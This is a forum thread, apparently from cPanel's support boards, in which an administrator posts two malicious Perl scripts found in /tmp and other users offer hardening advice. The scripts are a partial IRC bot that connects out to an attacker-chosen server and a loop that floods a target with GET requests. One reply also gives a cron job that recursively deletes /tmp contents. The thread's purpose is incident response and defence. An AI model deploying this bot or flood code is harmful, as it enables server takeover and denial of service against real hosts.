supicious file in /tmp dir

[shann]

Hi All,

I have got supecious filein our /tmp dir. This is the code they placed. Can anyone tell em how could we avoid thse?



#!/usr/bin/perl

use IO::Socket;

$ARGC=@ARGV;

$serv=$ARGV[0];
$chan=$ARGV[1];
$botnick=$ARGV[2];


$sock = IO::Socket::INET->new(
PeerAddr => $serv,
PeerPort => 6667,
Proto => 'tcp' ) or die "****************";

while($line = <$sock>){
print $line;

sleep 3;
print $sock "NICK $botnick\nUSER bot 0 0 :CCS bot\n";
last;


}

while($line = <$sock>){
print $line;
#use next line if the server asks for a ping
if($line =~ /^PING/){
print $sock "PONG :" . (split(/ :/, $line))[1];
}
if($line =~ /(376|422)/i){
print $sock "NICKSERV :identify nick_password\n";
last;
}
}

sleep 3;
print $sock "JOIN #$chan\n";
sleep 2;
print $sock "PRIVMSG #$chan :elite hackbot connected\n";

while ($line = <$sock>) {
($command, $text) = split(/ :/, $line); #$text is the stuff from the p
ing or the text from the server

cPanel.net Support Ticket Number:

[sexy_guy]

I hope for your sake you had a firewall active when they dropped this in /tmp. It listens for incoming connection on port 6667 then all they have to do is log in though port 6667 and you are owned.

If you didnt have a firewall you should probably check to make sure you havent been rooted.

cPanel.net Support Ticket Number:

[shann]

Thanks for your reply. Can you recommend some good firewall?

Thanks sexyguy

cPanel.net Support Ticket Number:

[sexy_guy]

Originally posted by shann
Thanks for your reply. Can you recommend some good firewall?

Thanks sexyguy

cPanel.net Support Ticket Number:

So you didnt have a firewall? Im using Bastille. You better download chkrootkit, compile it and run it and look for signs of a rootkit. And you better close port 6667 soon. Again i really question Cpanel security here. This is now the third drop into /tmp that iv seen in a week so my question would be what is being done about this?

cPanel.net Support Ticket Number:

[hostcp3]

*Please note*

no liability taken for errors, faults or issues which come for using the information posted here.


touch a file in /etc/cron.hourly or daily call it

rmtmp.sh


edit the file and paste this into it:

pushd /tmp;rm -r `ls | grep -v horde.log | grep -v lost+found | grep -v mysql.sock`;popd


let it run, just a warning, it does interfere a little with horde and other programs which use session id's.

run it daily if you like.

cPanel.net Support Ticket Number:

[jamesbond]

Originally posted by sexy_guy
So you didnt have a firewall? Im using Bastille. You better download chkrootkit, compile it and run it and look for signs of a rootkit. And you better close port 6667 soon. Again i really question Cpanel security here. This is now the third drop into /tmp that iv seen in a week so my question would be what is being done about this?

If you have mounted /tmp as noexec nosuid (you really have to do this yourself obviously) it will be difficult for someone to execute the script.

httpd chroot would be nice ofcourse
What actually happened to the development of httpd chroot:

Tue Apr 22 06:43:26 EDT 2003
6.x Build#24
---------------------------------------------------------------

better chroot httpd support

For now, mounting /tmp as noexec nosuid, changing permissions on compilers to root only, blocking unused ports and ofcourse having your server software up to date, will make it very difficult for people to succeed with these /tmp attacks.

With php you could set each user to use the /tmp in their home directory, instead of the /tmp directory everyone uses. I'm not sure what the advantage would be though, except for the fact that all php sessions are not stored in the 'general' /tmp anymore

cPanel.net Support Ticket Number:

[VHDave]

Originally posted by sexy_guy
I hope for your sake you had a firewall active when they dropped this in /tmp. It listens for incoming connection on port 6667 then all they have to do is log in though port 6667 and you are owned.

If you didnt have a firewall you should probably check to make sure you havent been rooted.

cPanel.net Support Ticket Number:

sexy_guy: That is absolutely incorrect. The script connects to the IRC server at the hostname and port specified (ARGV parameters via command prompt or other method of execution). It does not in any manner listen to port 6667 on your server. Having a firewall blocking incoming connections to port 6667 would be useless.

cPanel.net Support Ticket Number:

[shann]

Hi,

The thing is they kepp putting file in /tmp dir and executing. Making our server goes down.

Theis the latet code they palced. How could I aboid this. We don't have seprate partion for /tmp dir.

This si the latest code they placed and our server went down,.

#!/usr/bin/perl

use IO::Socket;

$ARGC=@ARGV;

$serv=$ARGV[0];


$sock = IO::Socket::INET->new(
PeerAddr => $serv,
PeerPort => 80,
Proto => 'tcp' ) or die "****************";

system("perl get.pl $serv &");
system("perl get.pl $serv &");


while(1){
print $sock "GET\n";
}


Any help.
tahnks

cPanel.net Support Ticket Number: